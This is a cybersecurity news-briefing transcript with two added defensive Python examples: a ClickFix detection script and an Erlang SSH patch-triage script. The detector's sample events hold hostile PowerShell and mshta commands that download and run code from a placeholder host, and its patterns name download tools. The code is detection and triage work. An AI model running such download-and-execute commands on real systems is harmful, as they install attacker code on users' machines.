
When fake fixes hide real attacks.
Adversary nations are using ClickFix in cyber espionage campaigns. Japan’s Financial Services Agency issues an urgent warning after hundreds of millions in unauthorized trades. The critical Erlang/OTP SSH vulnerability now has public exploits. A flawed rollout of a new Microsoft Entra app triggers widespread account lockouts. The alleged operator of SmokeLoader malware faces federal hacking charges. A new scam blends social engineering, malware, and NFC tech to drain bank accounts. GSA employees may have been oversharing sensitive documents. Yoni Shohet, Co-Founder and CEO of Valence Security, cautions financial organizations about coming Chinese open source AI. Crosswalks in the crosshairs of satirical hacking.
Today is Monday April 21st 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.
Adversary nations are using ClickFix in cyber espionage campaigns.
Government-backed hackers from North Korea, Iran, and Russia are now using a technique called ClickFix in cyber espionage campaigns, according to Proofpoint. This method tricks users into running malicious commands by displaying fake error messages or security alerts. Victims believe they’re fixing a problem but instead activate malware.
North Korea’s TA427 used ClickFix in early 2025 to target think tanks via fake meeting invites. Iran’s TA450 deployed it in late 2024 against Middle Eastern financial and government sectors through bogus Microsoft update emails. Russian groups TA422 and UNK_RemoteRogue also used it in phishing campaigns.
While not replacing all attack methods, ClickFix is being used to streamline infection steps. Proofpoint notes that Chinese hackers haven’t used ClickFix yet, but its growing use signals a rising trend among state-backed groups.
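The telltale of a ClickFix infection is not the lure but the execution: a person pastes a command into the Win+R Run dialog or a terminal, so the interpreter is a child of explorer.exe and the command line carries the download-and-run payload (often with a "✅ I am not a robot" comment appended so the dialog looks harmless). The following is an added example, not code from the briefing or from Proofpoint; it scores constructed Sysmon-style process-creation and RunMRU registry events against those traits. The field names follow Sysmon's schema, the event values and indicator weights are my own.

```python
"""Flag ClickFix-style command execution in constructed Sysmon-like events.

Added example (not from the original briefing or Proofpoint). EventID 1 is
process creation, EventID 13 a registry value set; the records are invented.
"""
import json
import ntpath
import re

# Interpreters a ClickFix lure tells the victim to paste its "fix" into.
CLICKFIX_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                     "wscript.exe", "cscript.exe"}
# Parents that mean a person launched it by hand (Win+R Run dialog, a terminal)
# rather than a service, installer or scheduled task.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "conhost.exe"}

# (name, case-insensitive pattern, weight). Weights are an assumption; tune them.
INDICATORS = [
    ("invoke-expression", r"\biex\b|invoke-expression", 3),
    ("remote-fetch", r"downloadstring|invoke-webrequest|\birm\b|\biwr\b|\bcurl\b|\bwget\b", 2),
    ("hidden-window", r"-w(indowstyle)?\s+hidden", 2),
    ("encoded-command", r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}", 3),
    ("mshta-url", r"mshta\s+https?://", 3),
    ("base64-decode", r"frombase64string", 2),
    # Lure text pasted along with the command so the Run dialog looks benign.
    ("captcha-lure", r"i am not a robot|verify you are human|\u2705", 3),
]
THRESHOLD = 3


def score_command(cmd):
    """Return (score, matched indicator names) for one command line."""
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, cmd or "", re.IGNORECASE):
            score += weight
            hits.append(name)
    return score, hits


def _exe(path):
    """Lower-cased file name of a Windows image path (works on any host OS)."""
    return ntpath.basename(path or "").lower()


def is_clickfix(ev):
    """True when the event looks like a user pasting a ClickFix payload."""
    if ev.get("EventID") == 1:
        if _exe(ev.get("Image")) not in CLICKFIX_CHILDREN:
            return False
        if _exe(ev.get("ParentImage")) not in INTERACTIVE_PARENTS:
            return False  # same payload from services.exe is a different hunt
        return score_command(ev.get("CommandLine"))[0] >= THRESHOLD
    if ev.get("EventID") == 13:
        # Win+R keeps its history under Explorer\RunMRU; the value data is the pasted text.
        if "\\explorer\\runmru\\" not in ev.get("TargetObject", "").lower():
            return False
        return score_command(ev.get("Details"))[0] >= THRESHOLD
    return False


def scan(jsonl):
    """Return [{'score', 'hits', 'event'}] for every flagged event in a JSON-lines string."""
    flagged = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        if is_clickfix(ev):
            score, hits = score_command(ev.get("CommandLine") or ev.get("Details"))
            flagged.append({"score": score, "hits": hits, "event": ev})
    return flagged


# Constructed sample telemetry: one real-looking ClickFix paste, one benign
# paste, one encoded command from a service (not interactive), one mshta lure,
# and the RunMRU registry write left behind by a Win+R paste.
SAMPLE_EVENTS = r'''
{"EventID":1,"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/fix.ps1')\" # \u2705 'I am not a robot - reCAPTCHA Verification ID: 7811'"}
{"EventID":1,"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe Get-Date"}
{"EventID":1,"ParentImage":"C:\\Windows\\System32\\services.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -NonInteractive -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AA=="}
{"EventID":1,"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta https://example.invalid/verify.hta"}
{"EventID":13,"Image":"C:\\Windows\\explorer.exe","TargetObject":"HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a","Details":"powershell -w hidden iex(irm https://example.invalid/x)\\1"}
'''

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        ev = hit["event"]
        print(hit["score"], hit["hits"], ev.get("CommandLine") or ev.get("Details"))
```

The parent-process gate is deliberate: the same encoded PowerShell launched by services.exe is worth a look, but it is not a ClickFix paste, and folding it in would bury the human-driven cases this technique depends on. Run it over real Sysmon exports (EventID 1 and EventID 13 on the RunMRU key) and expect to lower the weights for environments where admins legitimately paste one-liners.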
In spring 2024, Russian-linked hackers breached water plants in rural Texas, including in Muleshoe, triggering system malfunctions. While no ransom was demanded, the attack highlighted critical infrastructure vulnerabilities—an urgent concern for cybersecurity professionals.
These incidents weren’t isolated. Experts say they represent a growing trend: state-backed actors probing U.S. systems to test digital defenses. Similar threats include China’s Volt Typhoon and Salt Typhoon campaigns, which targeted telecom networks and government communications for long-term espionage.
Despite this rising threat landscape, the U.S. has weakened cyber defenses under the Trump administration—firing NSA leadership, cutting election security budgets, and slashing cybersecurity staff.
Some say the cybersecurity workforce gap remains a pressing issue, with over 500,000 professionals needed, while others are skeptical that the so-called gap even exists. Either way, as global tensions escalate and adversaries cooperate digitally, cyber pros must prepare for more complex, persistent, and politically motivated attacks.
Japan’s Financial Services Agency issues an urgent warning after hundreds of millions in unauthorized trades.
Japan’s Financial Services Agency (FSA) has issued an urgent warning after hackers conducted over $665 million in unauthorized trades via compromised brokerage accounts. Using phishing sites posing as legitimate firms, attackers stole customer credentials to access and manipulate accounts—often selling Japanese stocks to purchase Chinese ones, which remain in the victims’ accounts. At least 12 securities firms, including Nomura and Rakuten, reported 1,454 fraudulent trades and over 3,300 illegal access attempts. Brokerages will cover customer losses. Japan links rising threats to China-backed cyberattacks.
The critical Erlang/OTP SSH vulnerability now has public exploits.
A critical vulnerability in Erlang/OTP’s SSH daemon (CVE-2025-32433) now has public exploits, putting thousands of systems at risk. The flaw allows unauthenticated remote code execution and affects all devices using the daemon. Although patched in versions 25.3.2.10 and 26.2.4, many systems—especially in telecom and database infrastructure—remain unpatched. Proof-of-concept exploits were recently shared on GitHub and Pastebin, raising the risk of mass exploitation. Security experts urge immediate updates as attackers are expected to begin scanning and exploiting vulnerable systems.
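Triage here comes down to two questions: which hosts run Erlang's SSH daemon at all, and whether each one's OTP release is at or past the fix for its line. The block below is an added example, not code from the briefing or from the OTP project. It uses the fixed-version floors the briefing gives (25.3.2.10 for the OTP 25 line, 26.2.4 for OTP 26) and returns None for any other line, which should be read as "consult the vendor advisory". The banner format it looks for, `SSH-2.0-Erlang/<ssh application version>`, is an assumption about how the Erlang daemon identifies itself; that number is the ssh application's version, not the OTP release, so the banner is only good for building an inventory, not for deciding patch state.

```python
"""Triage for the Erlang/OTP SSH flaw (CVE-2025-32433): version floors and banner inventory.

Added example, not from the briefing or the OTP project. Fix floors are the two
the briefing names; other release lines return None (check the advisory).
"""
import re
import socket

# major OTP line -> first release the briefing reports as patched (assumption: these two only)
FIXED_FLOORS = {25: (25, 3, 2, 10), 26: (26, 2, 4)}

# Assumed identification line of the Erlang ssh daemon; the number is the ssh app version.
ERLANG_BANNER = re.compile(r"^SSH-2\.0-Erlang/(\S+)")


def parse_otp_version(text):
    """Turn 'OTP-26.2.3', '26.2.3' or '25.3.2.9' into a tuple of ints."""
    m = re.search(r"(\d+(?:\.\d+)+)", text)
    if not m:
        raise ValueError(f"no version string in {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def is_patched(version_text):
    """True if at/after the fix for its line, False if before, None if the line is unknown.

    Tuple comparison handles short versions correctly: (26, 2) < (26, 2, 4), so a bare
    26.2 is reported unpatched, while (26, 3) > (26, 2, 4) is patched.
    """
    version = parse_otp_version(version_text)
    floor = FIXED_FLOORS.get(version[0])
    if floor is None:
        return None
    return version >= floor


def erlang_ssh_version(banner):
    """ssh application version from an identification line, or None if not Erlang."""
    m = ERLANG_BANNER.match(banner.strip())
    return m.group(1) if m else None


def grab_banner(host, port=22, timeout=3.0):
    """Read the server's SSH identification line (it is sent before any client data)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        data = b""
        while b"\n" not in data and len(data) < 256:
            chunk = sock.recv(64)
            if not chunk:
                break
            data += chunk
    return data.decode("ascii", "replace").strip()


if __name__ == "__main__":
    # Constructed inputs; on a real host pass the contents of the OTP_VERSION file.
    for v in ("OTP-26.2.4", "26.2.3", "26.2", "25.3.2.10", "25.3.2.9", "27.3.2"):
        print(v, is_patched(v))
    print(erlang_ssh_version("SSH-2.0-Erlang/5.2.9"))
```

The full patch-level release is not what `erlang:system_info(otp_release)` returns (that is only the major, e.g. "26"); it lives in the `OTP_VERSION` file under `<root>/releases/<major>/`, which `erl` can read with `file:read_file(filename:join([code:root_dir(), "releases", erlang:system_info(otp_release), "OTP_VERSION"]))`. Feed that string to `is_patched`; use `grab_banner` plus `erlang_ssh_version` only to find which hosts on a range are worth asking.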
A flawed rollout of a new Microsoft Entra app triggers widespread account lockouts.
A flawed rollout of Microsoft Entra ID’s new “MACE Credential Revocation” app has triggered widespread false positive alerts and account lockouts across organizations. Admins reported that up to one-third of accounts were locked due to supposed leaked credentials, though the passwords were unique and protected by MFA. No signs of compromise were found, and breach checks showed no matches. The issue, linked to error code 53003, appears tied to MACE’s sudden deployment. Microsoft has yet to officially confirm the cause.
The alleged operator of SmokeLoader malware faces federal hacking charges.
Nicholas Moses, also known as “scrublord,” is facing federal hacking charges in Vermont for allegedly operating the SmokeLoader malware, stealing personal data from over 65,000 victims worldwide. Prosecutors say Moses used the malware to harvest passwords and sensitive information from infected devices between January 2022 and May 2023, maintaining a command server in the Netherlands. He allegedly sold stolen credentials for $1 to $5 each and claimed to have over half a million logs. SmokeLoader, a malware strain active since 2011, is popular among Russian cybercriminals for its modular design and ability to perform various attacks. Moses’s case follows Europol’s Operation Endgame, which recently targeted major malware droppers, including SmokeLoader. Authorities continue to investigate and arrest individuals linked to the botnet’s distribution and resale operations.
A new scam blends social engineering, malware, and NFC tech to drain bank accounts.
A new scam blending social engineering, malware, and NFC tech is targeting Android users and their payment cards, researchers at Cleafy report. Dubbed SuperCard X, the malware tricks victims via fake bank fraud alerts, urging them to call a number where scammers then collect PINs and convince users to remove card limits. Victims are later prompted to place their card near their infected device. The malware then uses NFC to silently capture card data, enabling instant theft outside traditional bank fraud channels. SuperCard X is linked to a malware-as-a-service (MaaS) model operated by Chinese-speaking developers, but used by different groups globally. Unlike past scams targeting specific banks, this campaign targets any debit or credit card. Authorities warn such NFC-based fraud is growing and may appear in more regions soon.
GSA employees may have been oversharing sensitive documents.
Internal records reviewed by The Washington Post reveal that General Services Administration (GSA) employees under both the Biden and Trump administrations improperly shared sensitive files—including White House blueprints and vendor banking details—with over 11,200 federal workers. The documents, stored in a Google Drive folder, included at least nine files marked “Controlled Unclassified Information” (CUI), which, while not classified, still require protection. Some files allowed editing access. The oversharing, ongoing since 2021, triggered a cybersecurity investigation last week. The breach included sensitive plans for the White House’s East and West Wings, and details for a proposed blast door. Though not necessarily classified, experts say such data should be tightly secured. The GSA has annual security training and scanning tools, but the incident highlights systemic weaknesses in document handling across administrations.
Crosswalks in the crosshairs of satirical hacking.
And finally, our malicious jaywalking desk tells us that crosswalk buttons in cities like Seattle and Silicon Valley have been hijacked to play AI-generated voices of tech billionaires like Jeff Bezos, Elon Musk, and Mark Zuckerberg. Instead of the usual robotic “Walk” or “Wait,” pedestrians were greeted with Bezos promoting Amazon Prime or joking about billionaires moving to Florida if taxed—classic parody wrapped in high-tech mischief.
The culprit? A mix of social commentary and shoddy security. The devices, made by crosswalk hardware giant Polara, are managed via a Bluetooth-enabled app called the Polara Field Service app. It was publicly available and protected only by the worst password in tech history—1234. Pranksters easily reprogrammed the devices to play custom, AI-generated audio.
While some call it “harmless fun,” the stunt raises serious issues. Visually impaired pedestrians depend on these audio cues to cross safely. Swapping them for tech tycoon impersonations isn’t just a laugh—it’s a hazard. It also highlights the risks of default credentials in critical infrastructure.
The app has since been pulled from app stores, but archived versions remain, meaning this could happen again. Municipal crews now face the tedious task of manually updating credentials on thousands of devices, one intersection at a time.
So, let this be a friendly PSA: customizable crosswalk audio? Great. Billionaire bedtime banter at intersections? Not so much. And for the love of pedestrians—change your default passwords.
And that’s the CyberWire.
For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.
We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com
We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.
N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.
N2K’s senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.